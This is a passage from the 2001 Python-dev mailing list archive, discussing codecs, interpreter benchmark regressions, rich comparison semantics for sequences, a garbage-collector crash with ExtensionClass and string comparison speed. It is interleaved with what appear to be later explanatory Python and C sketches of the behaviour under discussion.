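        return codecs.CodecInfo(_pickle_encode, _pickle_decode, name=PICKLE_CODEC)
    return None

codecs.register(_pickle_search)

record = (123, 'abc', 456.789)
blob = codecs.encode(record, PICKLE_CODEC)   # bytes
assert codecs.decode(blob, PICKLE_CODEC) == record
```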

> hypergeneralization, of course.
> 
> more candidates:
> 
>     "10".decode("int")
>     "10.0".decode("float")
>     "[1, 2, 3]".decode("list")
>     "readme.txt".decode("file")
>     "SyntaxError".decode("raise")
>     (etc)

You forgot the most important one ;-) ...

	"print 'My first Python program'".decode("python").run()

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip@pobox.com (Skip Montanaro)  Wed May 16 18:44:15 2001
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 16 May 2001 12:44:15 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
 <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
 <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
 <3B025F26.A625DE02@lemburg.com>
 <15106.36468.62292.611515@beluga.mojam.com>
 <002101c0de19$e7875a90$e46940d5@hagrid>
 <3B02A9D9.113836D6@lemburg.com>
Message-ID: <15106.48239.813965.579600@beluga.mojam.com>

    mal> Still their basic task is to take an object and encode it in some
    mal> way for dumps() and do the reverse for loads().  That's pretty
    mal> much what codecs normally do ;-)

Yes, I see that.  The conceptual problem I have is that in all previous
examples I've seen here, codecs have taken only strings or unicode objects
as input and returned only strings or unicode objects as output.

    mal> These two are very useful though when it comes to using codecs
    mal> for file wrappers:

This use I missed.  Thanks for the explanation.

Skip


From mal@lemburg.com  Wed May 16 19:33:44 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 20:33:44 +0200
Subject: [Python-Dev] Performance compares
Message-ID: <3B02C808.E3354D3F@lemburg.com>

After reading a little of the comparison thread, I ran some
performance comparisons of my own, between the current CVS version
and Python 1.5.2.

Both versions were compiled on the same Linux machine, using the
same GCC compiler and optimization settings.

Here are the results from pybench 0.9 and pystone; some of the
figures show quite dramatic slow-downs. I'm not sure where they
result from, but they do concern me a bit, since the upgrade
path from 1.5.2 is probably the most common one to be expected
in user-land.

Since it is possible that these figures result from my specific 
machine setup, I'd like to know what other people see on their
machines.

Thanks.
--

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second

--

PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                              per run    per oper.    diff *)
------------------------------------------------------------------------
          BuiltinFunctionCalls:    1152.60 ms    9.04 us   +64.70%
           BuiltinMethodLookup:     903.90 ms    1.72 us          
                 CompareFloats:     908.30 ms    2.02 us   +40.94%
         CompareFloatsIntegers:    1276.25 ms    2.84 us   +37.15%
               CompareIntegers:    1075.50 ms    1.19 us   +21.09%
                  CompareLongs:     989.40 ms    2.20 us   +47.12%
                CompareStrings:     844.80 ms    2.25 us   +33.99%
                CompareUnicode:    1018.65 ms    2.72 us       n/a
                 ConcatStrings:    1226.30 ms    8.18 us   +92.56%
                 ConcatUnicode:    1575.40 ms   10.50 us       n/a
               CreateInstances:    2094.05 ms   49.86 us  +101.86%
       CreateStringsWithConcat:    1515.75 ms    7.58 us  +111.67%
       CreateUnicodeWithConcat:    1833.85 ms    9.17 us       n/a
                  DictCreation:    2795.30 ms   18.64 us  +203.34%
             DictWithFloatKeys:    2285.70 ms    3.81 us   +18.73%
           DictWithIntegerKeys:    1444.65 ms    2.41 us   +58.53%
            DictWithStringKeys:    1262.60 ms    2.10 us   +52.83%
                      ForLoops:     989.95 ms   99.00 us   -10.01%
                    IfThenElse:    1232.45 ms    1.83 us   +23.25%
                   ListSlicing:     621.40 ms  177.54 us          
                NestedForLoops:     986.60 ms    2.82 us   +52.09%
          NormalClassAttribute:    1231.15 ms    2.05 us   +36.70%
       NormalInstanceAttribute:    1114.15 ms    1.86 us   +27.11%
           PythonFunctionCalls:    1251.25 ms    7.58 us   +46.09%
             PythonMethodCalls:    1034.35 ms   13.79 us   +42.19%
                     Recursion:     922.15 ms   73.77 us   +36.76%
                  SecondImport:    1055.45 ms   42.22 us  +100.47%
           SecondPackageImport:    1061.35 ms   42.45 us   +96.31%
         SecondSubmoduleImport:    1292.35 ms   51.69 us   +77.89%
       SimpleComplexArithmetic:    1748.00 ms    7.95 us  +120.97%
        SimpleDictManipulation:    1172.85 ms    3.91 us   +47.85%
         SimpleFloatArithmetic:     881.25 ms    1.60 us   +12.30%
      SimpleIntFloatArithmetic:     833.80 ms    1.26 us          
       SimpleIntegerArithmetic:     839.00 ms    1.27 us          
        SimpleListManipulation:    1252.60 ms    4.64 us   +69.37%
          SimpleLongArithmetic:    1360.65 ms    8.25 us  +100.43%
                    SmallLists:    2380.05 ms    9.33 us  +116.72%
                   SmallTuples:    1793.80 ms    7.47 us  +101.52%
         SpecialClassAttribute:    1257.35 ms    2.10 us   +37.91%
      SpecialInstanceAttribute:    1340.25 ms    2.23 us   +21.13%
                StringMappings:    1601.50 ms   12.71 us       n/a
              StringPredicates:    1059.70 ms    3.78 us       n/a
                 StringSlicing:    1235.90 ms    7.06 us   +98.32%
                     TryExcept:    1272.55 ms    0.85 us   +28.39%
                TryRaiseExcept:    1383.45 ms   92.23 us   +77.48%
                  TupleSlicing:    1163.05 ms   11.08 us   +75.29%
               UnicodeMappings:    1232.80 ms   68.49 us       n/a
             UnicodePredicates:    1294.95 ms    5.76 us       n/a
             UnicodeProperties:    1410.45 ms    7.05 us       n/a
                UnicodeSlicing:    1296.80 ms    7.41 us       n/a
------------------------------------------------------------------------
            Average round time:   73388.00 ms                  n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(Diffs not shown are below the noise level of +-10%.)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Wed May 16 20:07:49 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 15:07:49 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>

[Tim]
> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

[Guido]
> Unclear what you're asking.  The language doesn't require any
> particular semantics for sequence comparisons, but the language of
> course includes the tuple and list squence types, and it describes
> (albeing lacking some rigorous detail) what comparisons for those do.

The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world.  In a richcmp world, "compared
lexicographically" is fuzzy enough that different implementations may do
different things in good faith, competent users may disagree about what it
means in specific cases, and programs may yield different results across
implementations (or random CVS patches <wink>).

> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's
guaranteed by the language and what's left up to the implementation.

The full truth before was relatively simple.  For a pair x, y of lists or
tuples,

def __cmp__(x, y):  # pretending this is a method on lists and tuples
    i = 0
    while i < len(x) and i < len(y):
        c = cmp(x[i], y[i])
        if c:
            return c
        i += 1
    return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each
iteration.  What's left unexplained is the treatment of recursive lists, and
so the result of comparing them is a prime suspect for different behavior
across implementations and releases.

In a richcmp world, there are several additional ways in which the above
fails to capture the full truth, and each of those ways is another prime
suspect for surprises.

For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and
   that no element comparisons are to be performed after the leftmost
   element comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on
   elements, and that implementations are allowed (but not required)
   to skip all element comparisons when == or != comparison is given
   lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations must
emulate other semantically significant details of the current implementation,
like:

1. <=, <, > and >= comparisons will do at most one element comparison
   that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the long-
   winded details of how that works, incl. but not limited to the
   specific "first try ==, then try <, then try >" strategy used to
   simulate a pre-richcmp cmp() when all else fails.
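The "at most one element comparison that is not an == comparison" behaviour for < can be modelled in a few lines. This is a sketch for illustration in Python 3. The name seq_lt is hypothetical, and this is not CPython's C code. It skips the common prefix using only ==, and then either compares lengths or performs a single < on the first differing pair.

```python
def seq_lt(x, y):
    """Model of x < y for lists/tuples, as described above."""
    i = 0
    # Skip the common prefix, using only == on elements, left to right.
    while i < len(x) and i < len(y) and x[i] == y[i]:
        i += 1
    # One sequence is a prefix of the other: the shorter one is smaller.
    if i >= len(x) or i >= len(y):
        return len(x) < len(y)
    # Exactly one non-== element comparison settles the result.
    return x[i] < y[i]
```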

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b       #1
1
>>> [a] < [b]   #2
0
>>> cmp(a, b)   #3
0
>>> a > b       #4
1
>>> a == b      #5
1
>>> a != b      #6
1
>>>

Which of those results are *required* by the language, and which merely
*allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3
  and/or #6 results differed, e.g., under Jython, or under
  CPython 2.3.  Indeed, I'm not even sure why #6 returns 1 under
  CPython today, and I've been staring at this a lot lately <wink>
  ... OK, #6 ends up getting resolved by comparing object
  addresses, which leaves "required or not?" fuzzy (i.e., *must*
  it be resolved that way?  or is it implementation-defined?).


From guido@digicool.com  Wed May 16 21:35:46 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 15:35:46 -0500
Subject: [Python-Dev] Rich comparison of lists and tuples
In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400."
 <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>
Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>

[Subject fixed]

[Tim shows there's a lot left to the imagination when trying to glean
the meaning of list1==list2 using rich comparisons.]

I would like to break this down by defining the mapping between cmp()
and rich comparisons.

I propose:

- If cmp() is requested but not defined, and rich comparisons are
  defined, try ==, <, > in order; if all three yield false, act as if
  rich comparisons were not defined, and use the fallback comparison
  (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use
  the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of
  cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ

  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
easily go the extra mile and define != to use only != on the items;
but is this worth the extra complexity?
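Guido's proposal can be read as the following Python 3 model. This is a sketch only. The names cmp_from_rich, seq_eq and seq_ne are hypothetical, and in Python 3 the < and > calls raise TypeError for objects that do not define them. The model implements the ==, <, > fallback order with address comparison as a last resort, and the two == shortcuts for sequences, with != defined as "not ==".

```python
def cmp_from_rich(a, b):
    """Proposed cmp() when only rich comparisons exist: try ==, <, > in turn."""
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    # All three were false: fall back to comparing object addresses (ids).
    return (id(a) > id(b)) - (id(a) < id(b))

def seq_eq(x, y):
    # Shortcut 1: different lengths means different sequences, and no
    # element __eq__ is called at all.
    if len(x) != len(y):
        return False
    # Shortcut 2: compare elements with == only, stopping at the first false.
    for a, b in zip(x, y):
        if not a == b:
            return False
    return True

def seq_ne(x, y):
    # The proposal defines x != y for sequences as `not x == y`.
    return not seq_eq(x, y)
```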

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Wed May 16 21:37:43 2001
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 16 May 2001 15:37:43 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <20010516091942.A16455@glacier.fnational.com>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
 <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
 <15103.65486.61021.328424@beluga.mojam.com>
 <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
 <20010516091942.A16455@glacier.fnational.com>
Message-ID: <15106.58647.495143.164636@beluga.mojam.com>

    Neil> In other words the GC is finding a tuple object that contains an
    Neil> element with a funny looking address (data segment?) and an
    Neil> ob_type of NULL.

Neil,

I'm not sure if the funny looking address is a red herring or the key to the
crime.  I tried running with a breakpoint set in getBaseDictionary.  The
first couple times, the type parameter looked like

    $26 = (PyExtensionClass *) 0x80e7f60
    $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7138 "ExtensionClass", ...}

    $28 = (PyExtensionClass *) 0x80e8060
    $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7209 "Base", ...}

The third time it looked like

    $30 = (PyExtensionClass *) 0x4019f120
    $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x4019dab2 "GObject", ...}

The difference between the first two calls and the third one is that the
first two objects are defined in ExtensionClass.o, which I currently
statically link into the interpreter.  The Gtk/GObject stuff is dynamically
loaded into the running executable, so it's not surprising that it winds up
at a wildly different address than the ExtensionClass stuff.  My current
best guess is that whatever object the tuple is referring to is declared
static in the dynamically loaded Gtk stuff and has no business getting
reclaimed by the collector.  Sounds like a missing Py_INCREF somewhere.

At the earliest point I've been able to check that object so far, its
ob_type field is NULL.

Skip


From cpr@emsoftware.com  Wed May 16 23:24:15 2001
From: cpr@emsoftware.com (Chris Ryland)
Date: Wed, 16 May 2001 18:24:15 -0400
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2>

This talk is most entertaining! Highly recommended to you good folk, if only
as a reinforcement of the good design principles embodied in Python (with
the exception of print >> ;-).

Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he
wanted to give an example of a modern dynamic language (disclaiming a lot of
knowledge about it). He mentioned it three or four times (usually
positively), so it must be on the tip of his mind.
--
Cheers!
Chris Ryland
Em Software, Inc.
www.emsoftware.com


From greg@cosc.canterbury.ac.nz  Thu May 17 02:49:31 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 17 May 2001 13:49:31 +1200 (NZST)
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal@lemburg.com>:

> You forgot the most important one ;-) ...
>
>	"print 'My first Python program'".decode("python").run()

Surely that should be:

   "'My first Python program'.encode('stdout')".decode("python").decode("run")

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one@home.com  Thu May 17 02:56:56 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 21:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>

[Martin v. Loewis]
> I'll put a patch on SF soon which does what you want to do, i.e. tries
> tp_compare as the first thing if tp_richcompare is not there.

Thanks!  I'll check it out.

> Even with this patch, your code is faster if strings have a
> richcompare.

OK, from what I understand, that makes no sense.  Does it to you?  Assuming
you're still talking about my silly little

     "ab" < "cd"

test, then all the new code you put into your richcompare slot was a waste of
cycles for that specific case:  the new richcmp "objects the same type?" test
would fail, then the new "pointers equal?" test would fail, then the new "op
== Py_EQ?" test would fail, and then richcompare would give up and call
string_compare() anyway.  So I'm either missing something fundamental about
what you did, or it's a timing anomaly on your box that defies obvious
explanation ("but if I add three new tests that don't pay off, and make an
extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
>
> With it, I get
>
> 0.710
> 0.720
> 0.720
> 0.710
> 0.710
> 0.720
> 0.710
> 0.710
> 0.710
> 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the difference is
> negligible, though.

Oh, I don't like giving up that easy on things that make no sense --
something else is happening here, although I've no idea what.
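As a quick summary of the two timing columns Martin reported, using only the quoted numbers, the means are 0.723 s and 0.714 s. The difference is about 9 ms per run, or roughly 1.2%, which is close to the 10 ms granularity of the figures themselves. The variable names are illustrative.

```python
from statistics import mean, stdev

# Martin's quoted timings in seconds, ten runs each.
without_richcmp = [0.720, 0.720, 0.720, 0.730, 0.720,
                   0.720, 0.730, 0.720, 0.720, 0.730]
with_richcmp = [0.710, 0.720, 0.720, 0.710, 0.710,
                0.720, 0.710, 0.710, 0.710, 0.720]

for label, runs in (("without", without_richcmp), ("with", with_richcmp)):
    print("%-7s richcompare: mean %.4f s, stdev %.4f s"
          % (label, mean(runs), stdev(runs)))

diff = mean(without_richcmp) - mean(with_richcmp)
print("difference: %.4f s (%.1f%%)" % (diff, 100 * diff / mean(without_richcmp)))
```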


From tim.one@home.com  Thu May 17 03:17:37 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 22:17:37 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>

[MAL]
> Since it is possible that these figures result from my specific
> machine setup, I'd like to know what other people see on their
> machines.

Is this the same machine where you were able to get 15% difference a few
years ago by adding or removing an unreachable printf in ceval.c (or was that
Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
<wink>.

My Win98SE box is *astonishingly* useless for timings.  Without fail, the
first time I run pystone after a reboot yields a result a solid 50% higher
than the second or subsequent times I run it (yes, it's major-league *slower*
the second time).  This is true across dozens of trials over several months,
and across all versions of Python.

And simple little loops routinely vary in reported runtime by a factor of 3.
I may have to dig my old Win95 box out of the packing crate <0.6 wink>.

None of that changes, of course, that the numbers you got are scary.


From jeremy@digicool.com  Wed May 16 23:37:47 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Wed, 16 May 2001 18:37:47 -0400 (EDT)
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
References: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <15107.315.19349.268345@slothrop.digicool.com>

As usual, the results you're reporting are quite different than what I
see on my machine.  I'd like to think that my machine is more normal
than yours, but I expect we're both oddballs <0.2 wink>.  I see
basically the same slowdowns that you see, but the amount of the
slowdown is quite a bit smaller.

I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and
the -O3 flag; ran pybench on an 800MHz P3 with 256MB RAM running Linux
2.2.17.

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 0.85
This machine benchmarks at 11764.7 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 0.94
This machine benchmarks at 10638.3 pystones/second
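To compare these pystone runs with MAL's earlier ones, the relative slowdown can be computed from the reported times for 10000 passes. Pystone's figure is passes divided by elapsed time. The helper names are illustrative, and the times are taken from the two messages. On these numbers, MAL's CVS build takes about 35.9% longer than 1.5.2, and Jeremy's about 10.6% longer.

```python
def pystones_per_second(seconds, passes=10000):
    # Pystone reports passes / elapsed time.
    return passes / seconds

def slowdown_percent(old_seconds, new_seconds):
    # Extra time taken by the new build, relative to the old one.
    return (new_seconds / old_seconds - 1) * 100

# Reported times for 10000 passes: (Python 1.5.2, Python CVS).
runs = {"MAL": (3.26, 4.43), "Jeremy": (0.85, 0.94)}
for who, (old, new) in runs.items():
    print("%s: %.2f -> %.2f pystones/s, %.1f%% slower" % (
        who, pystones_per_second(old), pystones_per_second(new),
        slowdown_percent(old, new)))
```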

PYBENCH 0.9

Benchmark: cvs (rounds=10, warp=100)

Tests:                              per run    per oper.  diff *)
------------------------------------------------------------------------
          BuiltinFunctionCalls:      41.85 ms    1.64 us  +31.40%
                 CompareFloats:      39.60 ms    0.44 us  +13.96%
         CompareFloatsIntegers:
               CompareIntegers:
                  CompareLongs:      39.85 ms    0.44 us  +15.01%
                CompareStrings:
                CompareUnicode:
                 ConcatStrings:      48.65 ms    1.62 us  +46.76%
                 ConcatUnicode:
               CreateInstances:      75.75 ms    9.02 us  +55.54%
       CreateStringsWithConcat:      51.60 ms    1.29 us  +62.78%
       CreateUnicodeWithConcat:
                  DictCreation:      87.80 ms    2.93 us  +115.72%
             DictWithFloatKeys:
           DictWithIntegerKeys:
            DictWithStringKeys:
                      ForLoops:      63.85 ms   31.93 us  -13.60%
                    IfThenElse:
                   ListSlicing:
                NestedForLoops:      32.95 ms    0.66 us  +10.39%
          NormalClassAttribute:
       NormalInstanceAttribute:
           PythonFunctionCalls:      48.85 ms    1.48 us  +11.78%
             PythonMethodCalls:      38.95 ms    2.60 us  +12.09%
                     Recursion:
                  SecondImport:      37.80 ms    7.56 us  +65.79%
           SecondPackageImport:      38.95 ms    7.79 us  +50.68%
         SecondSubmoduleImport:      49.90 ms    9.98 us  +35.05%
       SimpleComplexArithmetic:      58.95 ms    1.34 us  +74.67%
        SimpleDictManipulation:
         SimpleFloatArithmetic:
      SimpleIntFloatArithmetic:
       SimpleIntegerArithmetic:
        SimpleListManipulation:      43.65 ms    0.81 us  +15.63%
          SimpleLongArithmetic:      42.70 ms    1.29 us  +53.32%
                    SmallLists:      79.15 ms    1.55 us  +56.89%
                   SmallTuples:      66.65 ms    1.39 us  +43.03%
         SpecialClassAttribute:
      SpecialInstanceAttribute:
                StringMappings:
              StringPredicates:
                 StringSlicing:      39.00 ms    1.11 us  +28.71%
                     TryExcept:
                TryRaiseExcept:      50.60 ms   16.87 us  +27.46%
                  TupleSlicing:      37.90 ms    1.80 us  +26.54%
               UnicodeMappings:
             UnicodePredicates:
             UnicodeProperties:
                UnicodeSlicing:
------------------------------------------------------------------------
            Average round time:    3177.00 ms                n/a

*) measured against: 1.5.2 (rounds=10, warp=100)

(As MAL did, I removed all the results where the difference is within
+/-10%.)

i-never-do-simple-complex-arithmetic-anyway-ly yr's,
Jeremy


From martin@loewis.home.cs.tu-berlin.de  Thu May 17 07:12:18 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:12:18 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>

> OK, from what I understand, that makes no sense.  Does it to you?

After reviewing everything again, I think I now do: In the richcomp
case, I have

			res = (*f1)(v, w, op);
			if (res != Py_NotImplemented)
				return res;

f1 is string_richcompare, so I get 2 function calls inside do_richcmp:
one to string_richcompare, the other one to string_compare, as my
optimizations are not triggered in your example.

If I set tp_richcompare of strings to 0, I get past this code, and do

		c = (*f)(v, w);
		if (PyErr_Occurred())
			return NULL;
		return convert_3way_to_object(op, c);

Here, I get 3 function calls: f is string_compare, then
PyErr_Occurred, finally convert_3way_to_object, which converts
{-1,0,1} x Op -> {Py_True, Py_False}.

Indeed, when I inline convert_3way_to_object, I get the same speed in
both cases (with the remaining differences attributed to measurement
and gcc doing register usage differently in both functions).
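To make the conversion step concrete, here is a minimal standalone sketch of what a convert_3way_to_object-style helper does. It maps a three-way result (negative, zero, positive) plus a comparison operator to a truth value. The enum and the function name are hypothetical stand-ins. The real CPython helper returns a Python object rather than an int.

```c
/* Hypothetical stand-ins for CPython's Py_LT ... Py_GE opcodes. */
typedef enum { OP_LT, OP_LE, OP_EQ, OP_NE, OP_GT, OP_GE } cmp_op;

/* Map a three-way result c (<0, 0, >0) and an operator to 0 or 1.
   This plays the role of convert_3way_to_object, minus the boxing
   of the result into a Python object. */
static int three_way_to_bool(cmp_op op, int c)
{
    switch (op) {
    case OP_LT: return c < 0;
    case OP_LE: return c <= 0;
    case OP_EQ: return c == 0;
    case OP_NE: return c != 0;
    case OP_GT: return c > 0;
    case OP_GE: return c >= 0;
    }
    return 0; /* not reached for valid operators */
}
```

On the tp_compare path, this conversion is the third call, after the three-way comparison itself and the PyErr_Occurred() check. That is why inlining it closes most of the gap.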

I'd still be in favour of giving strings a richcompare, since it
allows us to optimize what I think is the single most frequent case:
Py_EQ on strings. With a control flow like

		if (a->ob_size != b->ob_size)
			goto False;

		if (a->ob_size == 0)
			goto True;

		if (a->ob_sval[0] != b->ob_sval[0])
			goto False;

		if (memcmp(a->ob_sval, b->ob_sval, a->ob_size))
			goto False;
		else
			goto True;

we can reduce the number of function calls.
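The equality control flow above can be written as a standalone function. This is a sketch under assumptions. The `str_obj` struct is a hypothetical, simplified stand-in for PyStringObject that keeps only a length and a byte pointer (in CPython, `ob_sval` is an inline char array). It follows the same order of checks: length, empty, first byte, and finally memcmp.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical simplified string object: only the fields the
   fast path needs. */
typedef struct {
    size_t ob_size;        /* number of bytes in ob_sval */
    const char *ob_sval;   /* the bytes themselves */
} str_obj;

/* Py_EQ-style test following the control flow above.
   Returns 1 if the strings are equal, 0 otherwise. */
static int str_eq(const str_obj *a, const str_obj *b)
{
    if (a->ob_size != b->ob_size)
        return 0;                       /* different lengths */
    if (a->ob_size == 0)
        return 1;                       /* both empty */
    if (a->ob_sval[0] != b->ob_sval[0])
        return 0;                       /* cheap first-byte reject */
    return memcmp(a->ob_sval, b->ob_sval, a->ob_size) == 0;
}
```

Every early return avoids the memcmp call. Only strings of equal length that share a first byte pay for the full comparison.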

Regards,
Martin


From skip@pobox.com (Skip Montanaro)  Thu May 17 07:42:41 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 17 May 2001 01:42:41 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
Message-ID: <15107.29409.242342.200378@beluga.mojam.com>

Over the past couple days I've included python-dev on various messages in an
ongoing thread about a segmentation violation I was getting with the new
PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
Schemenauer, I finally know what's going on and I have a simple workaround
that lets me get back to work.  Here's a summary of the problem.

When defining ExtensionClass types, you need to create and initialize a
PyExtensionClass struct.  It looks something like so:

    PyExtensionClass PyGtkTreeSortable_Type = {
	PyObject_HEAD_INIT(NULL)
	0,				/* ob_size */
	"GtkTreeSortable",			/* tp_name */
	sizeof(PyPureMixinObject),	/* tp_basicsize */
	...
    };

Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
normally be the address of a type object (e.g. &PyType_Type).  However, Jim
Fulton pointed out that on Windows you can't get the address of &PyType_Type
object at compile time.  Accordingly, ExtensionClass provides a
PyExtensionClass_Export macro whose responsibility is, in part, to set the
ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
will know why.  I just accept Jim's word as gospel and move on...)

A problem arises if the garbage collector runs while the module
initialization function is running, but before all the ob_type fields have
been assigned their correct values.  In this case, a one-element tuple
representing the bases of a particular PyGtk extension class was traversed
by the garbage collector.

The workaround turns out to be exceedingly simple:

    import gc
    gc.disable()
    import gtk
    gc.enable()

I can handle doing that from Python code for the time being and will leave
it up to others to decide how, if at all, ExtensionClass should be changed
to correct the problem.

Skip


From martin@loewis.home.cs.tu-berlin.de  Thu May 17 07:41:15 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:41:15 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>

> 1. String objects are also equal despite being different objects,
>    if their ob_sinterned pointers are equal and non-NULL.  So if
>    you're looking for every trick in & out of the book, that's
>    another one.

That does not help. In the entire test suite, there are 0 instances
where strings are compared which are not identical, but have equal
ob_sinterned pointers.

> > So 5% of the calls are with identical strings, for which I can
> > immediately decide the outcome.
>
> But also at the cost of doing a fruitless compare and branch in 95%
> of calls.

Whether there's a fruitless branch depends on your compiler. With gcc
3, you can write

	if (__builtin_expect(a == b, 0)) {

and then the body of the if block will be moved out of the way of
linear control flow.
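The following is a minimal sketch of the branch hint in context. `__builtin_expect` is a GCC extension (Clang accepts it too), so the hypothetical `UNLIKELY` macro falls back to the plain expression on other compilers. The hint only informs code layout. The compiler is free to ignore it, and it never changes the result.

```c
#include <stddef.h>
#include <string.h>

/* Branch hint: GCC/Clang only; a no-op wrapper elsewhere. */
#if defined(__GNUC__)
#  define UNLIKELY(x) __builtin_expect(!!(x), 0)
#else
#  define UNLIKELY(x) (x)
#endif

/* Compare two byte buffers of equal length n. The identity test is
   marked unlikely, so the compiler may place the early return out of
   line and keep the common memcmp path straight. */
static int bytes_equal(const char *a, const char *b, size_t n)
{
    if (UNLIKELY(a == b))
        return 1;                 /* same buffer: the rare case */
    return memcmp(a, b, n) == 0;  /* the common case */
}
```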

> Any idea where those 800,000 virgin calls to oldcomp are coming
> from?  That's a lot.

